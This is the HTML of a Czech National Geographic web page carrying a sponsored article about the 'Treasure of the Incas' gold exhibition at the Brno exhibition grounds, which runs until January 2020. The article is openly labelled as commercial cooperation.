<!DOCTYPE html>


<!--[if IE 8 ]><html xmlns:fb="https://ogp.me/ns/fb#" class='ie8' ><![endif]-->
<!--[if !IE 8]><!-- --><html xmlns:fb="https://ogp.me/ns/fb#" ><!--<![endif]-->
<head>





<script>
	dataLayer = [{
		'serverAdresa': 'www.national-geographic.cz',
		'rubrikaTitle': 'Články',
		'rubrikaName': 'clanky',
		'template': 'clanek',
		'title': "V Brně je vystaven největší zlatý poklad světa – výstava Poklad Inků",
		'autor': ' PR',
			'publishedDateTime': "2019-11-25T21:37:00+01:00",
        	'modifiedDateTime': "2019-11-25T21:37:00+01:00",
			'articleID': 2598579852,
			'back': "2598579852-8258-104",
		'topics': [],
		'galleryData': {
				'url': "http:\/\/www.national-geographic.cz\/galerie\/vystava-poklad-inku-v-brne.html?photo=1&back=2598579852-8258-104",
			'images': [
					{
						'url': "https:\/\/g.denik.cz\/104\/7a\/poklad-inku-brno-7_denik-150-3x2.jpg", 
						'description': "Poznejte příběhy incké říše, která zrodila ty nejodvážnější válečníky.",
						'source': "PR"
					},
					{
						'url': "https:\/\/g.denik.cz\/104\/1c\/poklad-inku-brno-8_denik-150-3x2.jpg", 
						'description': "Exponáty dosahují hodnoty několika desítek milionů dolarů.",
						'source': "PR"
					},
					{
						'url': "https:\/\/g.denik.cz\/104\/d0\/poklad-inku-brno-2_denik-150-3x2.jpg", 
						'description': "Zajímavý je i velký model bájného města Machu Picchu.",
						'source': "PR"
					},
					{
						'url': "https:\/\/g.denik.cz\/104\/7f\/poklad-inku-brno-9_denik-150-3x2.jpg", 
						'description': "Poklad zapůjčilo Muzeum zlata v Peru.",
						'source': "PR"
					},
					{
						'url': "https:\/\/g.denik.cz\/104\/cb\/poklad-inku-brno-11_denik-150-3x2.jpg", 
						'description': "Výstava názorně zpracovává celou historii osidlování amerického kontinentu.",
						'source': "PR"
					},
					{
						'url': "https:\/\/g.denik.cz\/104\/ae\/poklad-inku-brno-10_denik-150-3x2.jpg", 
						'description': "K vidění jsou stovky originálních zlatých exponátů.",
						'source': "PR"
					}
			],
			'count': 6,
	    },
		'breadcrumb': [
			{'name':"National Geographic", 'link':"www.national-geographic.cz"},
			{'name':"Články", 'link':"https:\/\/www.national-geographic.cz\/clanky\/"},
			{'name':"V Brně je vystaven největší zlatý poklad světa – výstava Poklad Inků", 'link':"https:\/\/www.national-geographic.cz\/clanky\/v-brne-je-vystaven-nejvetsi-zlaty-poklad-sveta-vystava-poklad-inku-20191128.html"},
		],
		'time': {
			'clientStart': new Date()
		},
		'device': "responsive",
		'url': 'https://www.national-geographic.cz/clanky/v-brne-je-vystaven-nejvetsi-zlaty-poklad-sveta-vystava-poklad-inku-20191128.html',
		'safety': [10,111],
		'version':'live',
	}];
</script><!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MDK6C6');</script>
<!-- End Google Tag Manager -->

<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-P2SSW3B');</script>
<!-- End Google Tag Manager -->
<meta name="google-site-verification" content="bKE-M84bHXPiFyGUsHtFFMrKCl1qNj0y4hSzXpT-e0A">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>V Brně je vystaven největší zlatý poklad světa – výstava Poklad Inků - National Geographic</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="imagetoolbar" content="no">
<meta name="robots" content="index,follow">
<meta name="keywords" lang="cs" content="">
<meta name="description" lang="cs" content="KOMERČNÍ SPOLUPRÁCE: Unikátní expozice na Výstavišti v Brně prezentuje více než sto originálních zlatých exponátů pocházejících z dob dávných civilizací Jižní Ameriky. Exponáty pro tuto výstavu poprvé opustily Peru a jejich převoz do Evropy se konal pod záštitou prezidenta Peru.">
<meta name="yandex-verification" content="08250dbf55e255c5">
<link rel="shortcut icon" href="https://g.denik.cz/images/favicon/national-geographic_cz.ico" type="image/x-icon">

<link rel="stylesheet" type="text/css" href="https://g.denik.cz/webtemp/cssloader-b529b5d78eb9-1574246621.css">
<link rel="stylesheet" type="text/css" href="https://g.denik.cz/webtemp/cssloader-009f4f73a9d0-1574246621.css">
<!--[if lt IE 9]><script src="https://g.denik.cz/webtemp/jsloader-f2d760122d0e-html5shiv.min-1415620627.js"></script>
<![endif]-->
<link rel="alternate" href="https://www.national-geographic.cz/rss/zobraz/" type="application/rss+xml" title="RSS kanál National Geographic">

	<meta property="og:site_name" content="National Geographic Česko">
	<meta property="og:type" content="article">
	<meta property="og:url" content="https://www.national-geographic.cz/clanky/v-brne-je-vystaven-nejvetsi-zlaty-poklad-sveta-vystava-poklad-inku-20191128.html">
	<meta property="og:title" content="V Brně je vystaven největší zlatý poklad světa – výstava Poklad Inků">
	<meta property="og:description" content="KOMERČNÍ SPOLUPRÁCE: Unikátní expozice na Výstavišti v Brně prezentuje více než sto originálních zlatých exponátů pocházejících z dob dávných civilizací Jižní Ameriky. Exponáty pro tuto výstavu poprvé opustily Peru a jejich převoz do Evropy se konal pod záštitou prezidenta Peru.">
	<meta property="og:author" content="https://www.facebook.com/natgeocesko/">
	<meta property="article:author" content="https://www.facebook.com/natgeocesko/">
	<meta property="og:image" content="https://g.denik.cz/104/7a/poklad-inku-brno-7_ng-detail-photo-p.jpg">
	<meta property="og:image:width" content="980">
	<meta property="og:image:height" content="652">
	<meta property="og:image:alt" content="Poznejte příběhy incké říše, která zrodila ty nejodvážnější válečníky.">
	<meta property="og:image:type" content="image/jpeg">
	<link rel="previewimage" href="https://g.denik.cz/104/7a/poklad-inku-brno-7_denik-380.jpg">


    <script type="text/javascript" async src="//assets.pinterest.com/js/pinit.js"></script>

</head>

<body id="NationalGeographicCZ">
<div class="page">
	<div class="toplista">
    <div id="top-lista" class="top-lista-projekt-national-geographic">
        <div class="top-lista-container">
            <div class="top-lista-right">
                <div class="top-lista-more">
                    více >>
                </div>
            </div>
            <ul>
                    <li>
                        <a href="https://www.denik.cz/" target="_blank"
                           title="Deník">
                            Deník
                        </a>
                    </li>
                    <li>
                        <a href="https://www.kondice.cz/" target="_blank"
                           title="Kondice">
                            Kondice
                        </a>
                    </li>
                    <li>
                        <a href="https://sip.denik.cz/" target="_blank"
                           title="Šíp">
                            Šíp
                        </a>
                    </li>
                    <li>
                        <a href="https://www.kafe.cz/" target="_blank"
                           title="Kafe">
                            Kafe
                        </a>
                    </li>
                    <li>
                        <a href="https://www.ireceptar.cz/" target="_blank"
                           title="iReceptář">
                            iReceptář
                        </a>
                    </li>
                    <li>
                        <a href="https://www.cars.cz/" target="_blank"
                           title="Cars">
                            Cars
                        </a>
                    </li>
                    <li>
                        <a href="http://www.dumazahrada.cz/" target="_blank"
                           title="Dům a zahrada">
                            Dům a zahrada
                        </a>
                    </li>
                    <li>
                        <a href="https://www.tipcars.com/" target="_blank"
                           title="TipCars">
                            TipCars
                        </a>
                    </li>
                    <li>
                        <a href="https://www.annonce.cz/" target="_blank"
                           title="Annonce">
                            Annonce
                        </a>
                    </li>
                    <li>
                        <a href="https://www.realcity.cz/" target="_blank"
                           title="Realcity">
                            Realcity
                        </a>
                    </li>
                    <li>
                        <a href="https://www.dotyk.cz/" target="_blank"
                           title="Dotyk">
                            Dotyk
                        </a>
                    </li>
                    <li>
                        <a href="https://www.national-geographic.cz/" target="_blank"
                           title="National Geographic">
                            National Geographic
                        </a>
                    </li>
                    <li>
                        <a href="https://automix.denik.cz/" target="_blank"
                           title="Automix">
                            Automix
                        </a>
                    </li>
                    <li>
                        <a href="http://vlasta.kafe.cz/" target="_blank"
                           title="Vlasta">
                            Vlasta
                        </a>
                    </li>
                    <li>
                        <a href="https://story.kafe.cz/" target="_blank"
                           title="Story">
                            Story
                        </a>
                    </li>
                    <li>
                        <a href="https://kvety.kafe.cz/" target="_blank"
                           title="Květy">
                            Květy
                        </a>
                    </li>
                    <li>
                        <a href="https://prekvapeni.kafe.cz/" target="_blank"
                           title="Překvapení">
                            Překvapení
                        </a>
                    </li>
                    <li>
                        <a href="http://www.igurmet.cz/" target="_blank"
                           title="iGurmet">
                            iGurmet
                        </a>
                    </li>
                    <li>
                        <a href="https://www.estranky.cz/" target="_blank"
                           title="eStránky">
                            eStránky
                        </a>
                    </li>
                    <li>
                        <a href="https://praktickazena.kafe.cz" target="_blank"
                           title="Kreativ">
                            Kreativ
                        </a>
                    </li>
                    <li>
                        <a href="https://www.automodul.cz/" target="_blank"
                           title="Automodul.cz">
                            Automodul.cz
                        </a>
                    </li>
            </ul>
        </div>
    </div>
	</div>
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=348273491966980&version=v2.0";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>

	<div class="leaderboard">
		<div class="inner">
<div class="ads-box label-right">
	<div id="leaderboard-top" data-loaded="false"></div>
</div>
<div id="sticky" data-loaded="false"></div>		</div>
	</div>

	<header class="page-header">
		<div class="inner">
			<h1>
				<a href="/">
					<img src="https://g.denik.cz/images/ng/ng_logo.svg" height="50" alt="">
				</a>
			</h1>

			<div class="search" role="search">
				<p class="sr-only">Hledat:</p>
					<form action="/clanky/v-brne-je-vystaven-nejvetsi-zlaty-poklad-sveta-vystava-poklad-inku-20191128.html" method="get" id="frm-hledaniForm">
						<input type="text" name="q" placeholder="Vyhledat" id="frm-hledaniForm-q" required data-nette-rules='[{"op":":filled","msg":"Zedejte hledaný text."}]'><input type="submit" name="odeslat" value="Hledat">
					<input type="hidden" name="do" value="hledaniForm-submit"><!--[if IE]><input type=IEbug disabled style="display:none"><![endif]-->
</form>

			</div>

		</div>
	</header>


	<nav class="page-navigation" role="navigation">
		<div class="inner">
			<ul>

		<li class="homepage">
			<a href="/">Úvodní stránka</a>
		</li>

		<li class="active">
			<a href="/clanky/">Články</a>
		</li>

		<li>
			<a href="/fotky/">Fotky</a>
		</li>

		<li>
			<a href="/souteze/">Soutěže</a>
		</li>

		<li>
			<a href="/kvizy/">Kvízy</a>
		</li>

		<li>
			<a href="/specialy/">Speciály</a>
		</li>

		<li>
			<a href="/casopis/">Časopis</a>
		</li>

		<li><a href="http://www.eshop-nationalgeographic.cz/">Eshop</a></li>

		<li>
			<a href="/pribehy-prirody/">Den v ZOO</a>
		</li>
			</ul>
		</div>
	</nav>



	<div class="page-content">
		<div class="inner">
    <div class="layout">
        <div class="column wide">
            <article class="article-base" itemscope itemtype="https://schema.org/Article">
                <h1 itemprop="headline">V Brně je vystaven největší zlatý poklad světa – výstava Poklad Inků</h1>
                <p itemprop="description">KOMERČNÍ SPOLUPRÁCE: Unikátní expozice na Výstavišti v Brně prezentuje více než sto originálních zlatých exponátů pocházejících z dob dávných civilizací Jižní Ameriky. Exponáty pro tuto výstavu poprvé opustily Peru a jejich převoz do Evropy se konal pod záštitou prezidenta Peru.</p>


                
                    




                

                <figure itemscope itemtype="https://schema.org/GalleryObject" class="GalleryObject">
                <div class="figure-inner">
                    <meta itemprop="representativeOfPage" content="True">
                        <div class="listing gallery">
                            <div class="listing-inner">
                                <div class="photo-wrap main">
                                    <a class="photo-link" href="/galerie/vystava-poklad-inku-v-brne.html?photo=1&amp;mm=10478575">


                                            <img src="https://g.denik.cz/104/7a/poklad-inku-brno-7_ng-list-gallery-lg-p.jpg" width="728" height="485" class="portrait">
                                    </a>
                                    <div class="tags">
                                        <a class="tag" href="/galerie/vystava-poklad-inku-v-brne.html?mm=10478575">Zobrazit galerii</a>
                                    </div>
                                </div>
                                <div class="photo-wrap side">
                                    <a class="photo-link" href="/galerie/vystava-poklad-inku-v-brne.html?photo=1&amp;mm=10478576">


                                            <img src="https://g.denik.cz/104/1c/poklad-inku-brno-8_ng-list-gallery-sm-p.jpg" width="243" height="162" class="portrait">
                                    </a>
                                </div>
                                <div class="photo-wrap side">
                                    <a class="photo-link" href="/galerie/vystava-poklad-inku-v-brne.html?photo=1&amp;mm=10478580">


                                            <img src="https://g.denik.cz/104/d0/poklad-inku-brno-2_ng-list-gallery-sm-p.jpg" width="243" height="162" class="portrait">
                                    </a>
                                </div>
                                <div class="photo-wrap side">
                                    <a class="photo-link" href="/galerie/vystava-poklad-inku-v-brne.html?photo=1&amp;mm=10478577">


                                            <img src="https://g.denik.cz/104/7f/poklad-inku-brno-9_ng-list-gallery-sm-p.jpg" width="243" height="360" class="portrait">
                                    </a>
                                </div>
                            </div>
                        </div>
                </div>
                </figure>


                <div class="article-area">
                    <div itemprop="text">
                        <div class="article-meta">
                            <p itemprop='author'><strong>Autor:</strong>
                                    <a href="/autor/pr-2651.html"> PR</a>
</p>
                            <p itemprop='datePublished'>25. 11. 2019</p>
                        </div>
                        <p>Jedná se o zlatý poklad nevyčíslitelné hodnoty. Na tyto exponáty se do Peru jezdí dívat miliony lidí z celého světa. Nyní jsou k vidění v Brně, kde výstava potrvá do konce ledna 2020.</p>
<p>Výstava Poklad Inků své návštěvníky zavede na jihoamerický kontinent ještě dávno před Kryštofem Kolumbem a odhalí jim dávné poklady původních civilizací.</p>
<p>Mezi nejcennější exponáty patří velká posmrtná zlatá maska zdobená smaragdy symbolizujícími nesmrtelnost. Tato maska váží téměř 2 kg, a kromě ceny samotného zlata, má nesmírně vysokou kulturní a duchovní hodnotu. Kromě této impozantní masky návštěvníci na výstavě uvidí pět korun dávných králů a jejich zlaté pohřební výbavy, včetně zlatých šperků a náhrdelníků z obrovských drahokamů. Dále je zde vystaveno velké množství rituálních předmětů jako jsou obětní nože, či poháry, a také např. zlatý vak na lístky koky ve tvaru posvátné pumy.</p>
<p><img src="https://g.denik.cz/104/6a/poklad-inku-brno-6_ng-list-article-p.jpg" alt="" title="" class="w600" data-autor="PR" /></p>
<p>„Hodnota celého pokladu je nevyčíslitelná. Pokud bych měla najít přirovnání, je to jako bychom vystavovali nejméně patery české korunovační klenoty, na množství zlata ho je na výstavě mnohem více,“ říká Květa Havelková, Tisková mluvčí JVS GROUP, která výstavu do ČR přivezla. Vše je doplněno texty o prastarých rituálech uctívajících zlaté bohy, kteří stvořili tento svět.</p>
<p>Na návštěvníky čekají i další krásné originální exponáty a instalace. Zajímavý je velký model bájného města Machu Picchu, zlatý trůn vládce Inků nebo Sluneční brána od jezera Titicaca. Nechybí 3D zóna, a pro děti je připravena zábavná Dobrodružná stezka, každý návštěvník dostane zdarma hlasového průvodce.</p>

<div id="commercial-article-native-detail" data-loaded="false"></div>
                    </div>

                        <div class="sidebar-area">
                            <div>
                                <div class="social_toolbox sticky">
	<div class="dv4-clanek-sdileni">
<script type="text/javascript" async src="https://platform.twitter.com/widgets.js"></script>
<div class="dv4-clanek-sdileni">
    <a title="Sdílej na Facebook" href="https://www.facebook.com/sharer.php?u=https://www.national-geographic.cz/clanky/v-brne-je-vystaven-nejvetsi-zlaty-poklad-sveta-vystava-poklad-inku-20191128.html" onclick="javascript:window.open(this.href,'', 'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=450,width=550,left=300,top=300');return false;" target="_blank" class="facebook"></a>
    <a title="Sdílej na Twitter" href="https://twitter.com/intent/tweet?url=https://www.national-geographic.cz/clanky/v-brne-je-vystaven-nejvetsi-zlaty-poklad-sveta-vystava-poklad-inku-20191128.html/&text=$nadpis/&via=KAFEcz" class="twitter"></a>
</div>
	</div>
                                </div>
                            </div>
                        </div>
                </div>




<div id="outstream" data-loaded="false"></div>

            </article>
        </div>

        <div class="column narrow">


<section class="light">
	<h1>Jsme na Facebooku</h1>
	<div class="fb-like-box"
		data-href="https://www.facebook.com/natgeocesko/"
		data-width="300" data-colorscheme="light" data-show-faces="false" data-header="false"
		data-stream="false" data-show-border="false"></div>
</section>

<div class="ads-box">
	<div id="button" data-loaded="false"></div>
</div><div class="ads-box">
	<div id="square-1" data-loaded="false"></div>
</div>


<div id="cx_top-gallery"></div>


<div class="sticker-bar">
	<div class="sticky">
<div class="ads-box">
	<div id="skyscraper-1" data-loaded="false"></div>
</div>	</div>
</div>
	<div class="sticker-bar" >
<div class="ads-box ks">
	<div id="commercial-article-KS1" data-loaded="false"></div>
</div>
<div id="commercial-article-KS2" data-loaded="false"></div>
<div id="commercial-article-KS3" data-loaded="false"></div>
<div id="commercial-article-KS4" data-loaded="false"></div>
	</div>


	<section class="teasers teasers-video" id="cx_teasers_video">
		<h1><a href="/video/"># VYBRANÁ VIDEA</a></h1>
		<div>


	<article class="listing article-small">
		<a href="/video/video-15minutova-rvacka-varanich-alfa-samcu-20170920.html">
			<figure>
					<img src="https://g.denik.cz/104/db/profimedia-0349218582_ng-sidebar-lg-l.jpg" width="377" height="212" alt="Varani vynikají vysokou inteligencí, proto v šarvátkách nevyhrává vždy ten silnější." title="Varani vynikají vysokou inteligencí, proto v šarvátkách nevyhrává vždy ten silnější." class="landscape">
			</figure>
			<h1>VIDEO: 15minutová rvačka dvou varaních alfa samců</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/tyden-vedy-a-techniky-av-cr-zacina-jiz-v-pondeli-20191109.html">
			<figure>
					<img src="https://g.denik.cz/104/32/vc-tvt-u-039-tery-039-34_ng-sidebar-lg-p.jpg" width="280" height="187" alt="" title="" class="portrait">
			</figure>
			<h1>Týden vědy a techniky AV ČR začíná již v pondělí!</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/tyden-vedy-a-techniky-av-cr-zverejnil-program-20191021.html">
			<figure>
					<img src="https://g.denik.cz/104/fb/image008tv_ng-sidebar-lg-p.jpg" width="280" height="186" alt="Devatenáctý ročník festivalu má podtitul Věda, svoboda, odpovědnost." title="Devatenáctý ročník festivalu má podtitul Věda, svoboda, odpovědnost." class="portrait">
			</figure>
			<h1>Týden vědy a techniky AV ČR zveřejnil program</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-airbus-a330-se-potopil-u-pobrezi-turecka-cilene-20190624.html">
			<figure>
					<img src="https://g.denik.cz/104/b7/profimedia-0447489910_ng-sidebar-lg-p.jpg" width="280" height="181" alt="" title="" class="portrait">
			</figure>
			<h1>VIDEO: Airbus A330 se potopil u pobřeží Turecka. Cíleně!</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-padly-strom-slouzi-jako-most-pro-nutrie-lisky-i-divoke-kocky-20190505.html">
			<figure>
					<img src="https://g.denik.cz/104/24/most-liska_ng-sidebar-lg-l.jpg" width="369" height="212" alt="Každá kontrola záběrů se proměnila v napínavé představení." title="Každá kontrola záběrů se proměnila v napínavé představení." class="landscape">
			</figure>
			<h1>VIDEO: Padlý strom slouží jako most pro nutrie, lišky i divoké kočky</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-psi-terapeut-na-baterky-ma-pomahat-nemocnym-i-seniorum-20190319.html">
			<figure>
					<img src="https://g.denik.cz/104/00/profimedia-0420479022_ng-sidebar-lg-l.jpg" width="379" height="212" alt="Nejnovějším robotickým kamarádem je štěně zlatého retrívra." title="Nejnovějším robotickým kamarádem je štěně zlatého retrívra." class="landscape">
			</figure>
			<h1>VIDEO: Psí terapeut na baterky má pomáhat nemocným i seniorům</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/jak-reaguji-rostliny-kdyz-jim-nekdo-ublizuje-20190219.html">
			<figure>
					<img src="https://g.denik.cz/104/2b/profimedia-0198242795_ng-sidebar-lg-p.jpg" width="280" height="187" alt="I bez nervového systému si rostliny vytvořili vlastní systém ochrany." title="I bez nervového systému si rostliny vytvořili vlastní systém ochrany." class="portrait">
			</figure>
			<h1>Jak reagují rostliny, když jim někdo ubližuje?</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/planeta-nebo-plast-prekvapivych-91-plastoveho-odpadu-neprojde-recyklaci-20190120.html">
			<figure>
					<img src="https://g.denik.cz/104/5c/plastic-gettyimages-500712980_ng-sidebar-lg-p.jpg" width="280" height="187" alt="Čínský dělník třídí plastové lahve při recyklaci ve vesnici Dong Xiao Kou na okraji Pekingu." title="Čínský dělník třídí plastové lahve při recyklaci ve vesnici Dong Xiao Kou na okraji Pekingu." class="portrait">
			</figure>
			<h1>Planeta, nebo plast? Překvapivých 91% plastového odpadu neprojde recyklací!</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/vanoce-ve-dvore-kralove-na-hrosi-mlade-si-museli-pockat-temer-30-let-20181219.html">
			<figure>
					<img src="https://g.denik.cz/104/6e/dvspdk-mlade-hrocha-simona-jirickova_ng-sidebar-lg-p.jpg" width="280" height="187" alt="Hroši se rodí zpravidla ve vodě, kde také tráví většinu času. Mládě ve Dvoře Králové se však narodilo na souši." title="Hroši se rodí zpravidla ve vodě, kde také tráví většinu času. Mládě ve Dvoře Králové se však narodilo na souši." class="portrait">
			</figure>
			<h1>Vánoce ve Dvoře Králové: Na hroší mládě si museli počkat téměř 30 let</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-mozek-ani-oci-netusi-aneb-nejlepsi-svetove-iluze-2018-20181106.html">
			<figure>
					<img src="https://g.denik.cz/104/2d/3diluze_ng-sidebar-lg-l.jpg" width="381" height="212" alt="Iluze vždy vychází ze skutečného podnětu, který je smyslovými receptory chybně interpretován." title="Iluze vždy vychází ze skutečného podnětu, který je smyslovými receptory chybně interpretován." class="landscape">
			</figure>
			<h1>VIDEO: Mozek ani oči netuší aneb Nejlepší světové iluze 2018</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-desivy-zpev-nejvetsiho-selfoveho-ledovce-na-svete-20181017.html">
			<figure>
					<img src="https://g.denik.cz/104/56/profimedia-0124856877_ng-sidebar-lg-p.jpg" width="280" height="187" alt='Rossův šelfový ledovec má rozlohu 472 960 kilometrů čtverečních (Česká republika "jen" 78 866 km²).' title='Rossův šelfový ledovec má rozlohu 472 960 kilometrů čtverečních (Česká republika "jen" 78 866 km²).' class="portrait">
			</figure>
			<h1>VIDEO: Fascinující &quot;zpěv&quot; největšího šelfového ledovce na světě</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-beluha-zabloudila-do-reky-temze-jen-35-km-od-londyna-20180927.html">
			<figure>
					<img src="https://g.denik.cz/104/8c/profimedia-0384501213_ng-sidebar-lg-p.jpg" width="280" height="210" alt="Běluhy se v kalných vodách orientují podobně jako netopýři echolokací ultrazvukovými vlnami." title="Běluhy se v kalných vodách orientují podobně jako netopýři echolokací ultrazvukovými vlnami." class="portrait">
			</figure>
			<h1>VIDEO: Běluha zabloudila do řeky Temže, jen 35 km od Londýna</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-proc-maji-opicaci-kahau-tak-legracni-dlouhe-nosy-20190828.html">
			<figure>
					<img src="https://g.denik.cz/104/77/kahau2_ng-sidebar-lg-p.jpg" width="280" height="183" alt="Kahau nosatý" title="Kahau nosatý" class="portrait">
			</figure>
			<h1>Proč mají opičáci kahau tak legrační dlouhé nosy?</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/ind-ktery-sazi-stromy-zachrance-nejvetsiho-ricniho-ostrova-na-svete-20180812.html">
			<figure>
					<img src="https://g.denik.cz/104/21/majuli2_ng-sidebar-lg-p.jpg" width="280" height="207" alt="Před 39 lety Jadav zasadil první strom..." title="Před 39 lety Jadav zasadil první strom..." class="portrait">
			</figure>
			<h1>Ind, který sází stromy: Zachránce největšího říčního ostrova na světě</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-zmrzlina-i-voda-z-hadice-aneb-jak-abnormalni-horka-zvladaji-zvirata-v-zoo-20180805.html">
			<figure>
					<img src="https://g.denik.cz/104/c2/d85-7114-export_ng-sidebar-lg-p.jpg" width="280" height="187" alt="Lama alpaka zvolila originální způsob osvěžení." title="Lama alpaka zvolila originální způsob osvěžení." class="portrait">
			</figure>
			<h1>VIDEO: Zmrzlina i voda z hadice aneb Jak abnormální horka zvládají zvířata v zoo</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-titanuv-penis-v-akci-aneb-kratky-zivot-rozkvetleho-zmijovce-20180711.html">
			<figure>
					<img src="https://g.denik.cz/104/cc/profimedia-0376393188_ng-sidebar-lg-p.jpg" width="280" height="256" alt="Botanici z New Yorku zachytili netradiční květenství na video." title="Botanici z New Yorku zachytili netradiční květenství na video." class="portrait">
			</figure>
			<h1>VIDEO: Titanův penis v akci aneb Krátký život rozkvetlého zmijovce</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/1-strom-365-dni-skryta-kamera-odhalila-spoustu-navstevniku-20171129.html">
			<figure>
					<img src="https://g.denik.cz/104/0a/liska-abruzzo_ng-sidebar-lg-l.jpg" width="438" height="212" alt="V rozlehlých lesích Národního parku Abruzzo žije na 40 druhů savců, 30 druhů plazů a 300 druhů ptáků." title="V rozlehlých lesích Národního parku Abruzzo žije na 40 druhů savců, 30 druhů plazů a 300 druhů ptáků." class="landscape">
			</figure>
			<h1>1 strom, 365 dní: Skrytá kamera odhalila spoustu návštěvníků</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/plasty-nebo-planeta-20180606.html">
			<figure>
					<img src="https://g.denik.cz/104/c9/ng6-plast_ng-sidebar-lg-l.png" width="424" height="212" alt="Pomozte zachránit planetu" title="Pomozte zachránit planetu" class="landscape">
			</figure>
			<h1>Plasty, nebo planeta?</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-vedci-nechapou-v-rudem-mori-se-poprve-objevila-200-tunova-modra-velryba-20180604.html">
			<figure>
					<img src="https://g.denik.cz/104/48/profimedia-0103089551_ng-sidebar-lg-p.jpg" width="280" height="210" alt="Plejtvák obrovský je schopný ve vodě vyvinout rychlost až 50 km v hodině." title="Plejtvák obrovský je schopný ve vodě vyvinout rychlost až 50 km v hodině." class="portrait">
			</figure>
			<h1>VIDEO: Vědci nechápou! V Rudém moři se poprvé objevila 200 tunová modrá velryba</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/casopis-national-geographic-od-kvetna-v-novem-podivejte-se-20180514.html">
			<figure>
					<img src="https://g.denik.cz/104/cc/ngn_ng-sidebar-lg-l.jpg" width="349" height="212" alt="" title="" class="landscape">
			</figure>
			<h1>Časopis National Geographic od května v novém! Podívejte se</h1>
		</a>
	</article>
		</div>
	</section>

        </div>
    </div>
		</div>
	</div>

	    <div>
	        <div class="inner">
<div class="ads-box label-right">
	<div id="leaderboard-bottom" data-loaded="false"></div>
</div>
	        </div>
	    </div>

	<footer class="page-footer">
		<div class="inner">

			<div id="strossle_footer">
        
        <div data-spklw-widget="widget-5746bf054fa3a"></div>





			</div>

			<div class="layout">
				<div class="column narrow">
					<section class="footer-magazine">
						<h1>Časopis National Geographic</h1>
						<div>
							<h2>Aktuální číslo</h2>
							<ul>
<li><strong>MIZEJÍ:</strong> Co ztrácíme, když zvířata vymírají.</li>
<li><strong>PŘEŽÍVAJÍ LIDEM NAVZDORY:</strong> Mořské želvy putují oceány už přes sto milionů let, ale my lidé tyto houževnaté plazy ohrožujeme v samé podstatě jejich existenci.</li>
<li><strong>ŽIRAFY:</strong> Fascinující obři čelí v Africe stále větším hrozbám. Přemístění zvířat by mohlo pomoci při záchraně některých druhů – jsou s ním ale spojena nová nebezpečí.</li>
<li><strong>KDE SE RYBÁM ZASTAVIL ČAS:</strong> Rozsáhlá – a hrůzostrašná – sbírka mořských živočichů, kterou pořídil biolog z Louisiany, přináší svědectví o tom, jak lidé přivedli některé živočišné druhy až na práh vyhubení.</li>
<li><strong>DINOSAURUS V POKOJI:</strong> Fosilie dávno vyhynulých tvorů nejsou vyhrazeny muzeím. Dnes se najdou i v domovech a v podnicích – díky kontroverzní zálibě zámožných sběratelů.</li>
</ul>
<p><strong>Vychází 8. října 2019.</strong></p>
						</div>
					</section>
				</div>

				<div class="column wide">
					<section class="footer-subscription">
						<h1>Předplatné časopisu</h1>
						<p>Exkluzivní měsíčník National Geographic přináší strhující pohled do přírodních,
						technických, kulturních a etnických tajů tohoto světa.</p>
						<figure>
							<img src="https://g.denik.cz/104/fe/cover-ng-10-01_ng-mag-footer.jpg" width="177" height="256" alt="National Geographic" title="National Geographic">
						</figure>
						<h2>Redakční pilíře:</h2>
						<ul>
							<li>Poznání o přírodních jevech</li>
							<li>Pohledy do zákulisí vědeckých expedic</li>
							<li>Přiblížení kultur a zvyků vzdálených národů</li>
							<li>Představení zajímavostí ze světa vědy a techniky</li>
							<li>Lokální reportáže s českou tématikou</li>
							<li>Exkluzivní fotografické záběry</li>
							<li>Mapové přílohy jsou součástí obsahu časopisu několikrát za rok</li>
						</ul>
						<p><a href="/casopis/">Více o časopisu</a></p>
					</section>
				</div>
			</div>


				<div class="footer-links">
					<p>&copy; 2009 - 2019 National Geographic Society and <a href="https://www.vlmedia.cz" target="_blank">VLTAVA LABE MEDIA a.s.</a> All rights reserved.</p>

					<ul>
						<li><a href="https://www.national-geographic.cz/rss/feed.html">RSS</a></li>
